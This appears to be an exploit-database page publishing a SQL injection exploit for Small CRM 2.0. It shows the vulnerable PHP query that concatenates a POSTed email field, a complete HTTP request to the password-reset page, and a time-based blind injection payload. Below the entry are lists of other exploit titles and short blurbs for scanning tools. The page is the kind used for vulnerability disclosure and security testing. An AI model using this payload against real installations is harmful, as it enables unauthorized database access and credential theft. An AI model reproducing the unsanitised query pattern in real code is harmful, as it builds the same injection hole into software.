Menu

Search for hundreds of thousands of exploits

"Small CRM 2.0 - 'email' SQL Injection"

Author

Exploit author

"Ahmet Ümit BAYRAM"

Platform

Exploit platform

php

Release date

Exploit published date

2020-10-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: Small CRM 2.0 - 'email' SQL Injection
# Google Dork: N/A
# Date: 2020-10-10
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: V2.0
# Tested on: Kali Linux
# CVE : N/A

========== Vulnerable Code ==========

mysqli_query $row1 = mysqli_query($con, "select email,password from user
where email='" . $_POST['email'] . "'");  // dbconnection.php

========== Post Request ====================

POST /crm/forgot-password.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost/crm/forgot-password.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: close
Cookie: __test=ec283e73906679549573af64209a5d5b;
PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497
Upgrade-Insecure-Requests: 1

email=test@test.com&submit=

============= Vulnerable Parameter ===============

email (POST)

============= Payload  =========================

' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-13 "berliCRM 1.0.24 - 'src_record' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2020-10-12 "Small CRM 2.0 - 'email' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-12-09 "PRO-7070 Hazır Profesyonel Web Sitesi 1.0 - Authentication Bypass" webapps php "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Firma Rehberi 1 - 'il' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 2 - 'ara' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi E-Ticaret 3 - 'a' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Firma 13 - 'oz' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Rent a Car 3 - 'klima' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-04-08 "Jobgator - 'experience' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "iScripts ReserveLogic - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-03 "Ashop Shopping Cart Software - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-02 "Inout EasyRooms - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-04-02 "Inout RealEstate - 'city' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-28 "Jettweb PHP Hazır Rent A Car Sitesi Scripti V2 - 'arac_kategori_id' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-28 "Airbnb Clone Script - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-27 "Jettweb Hazır Rent A Car Scripti V4 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-26 "Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-26 "XooDigital - 'p' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-26 "XooGallery - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-26 "SJS Simple Job Script - SQL Injection / Cross-Site Scripting" webapps php "Ahmet Ümit BAYRAM"
2019-03-25 "Jettweb PHP Hazır Haber Sitesi Scripti V2 - SQL Injection (Authentication Bypass)" webapps php "Ahmet Ümit BAYRAM"
2019-03-25 "Jettweb PHP Hazır Haber Sitesi Scripti V3 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-25 "Jettweb PHP Hazır Haber Sitesi Scripti V1 - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-25 "Zeeways Matrimony CMS - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-25 "Zeeways Jobsite CMS - 'id' SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Inout Article Base CMS - SQL Injection" webapps php "Ahmet Ümit BAYRAM"
2019-03-22 "Matri4Web Matrimony Website Script - Multiple SQL Injection" webapps php "Ahmet Ümit BAYRAM"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.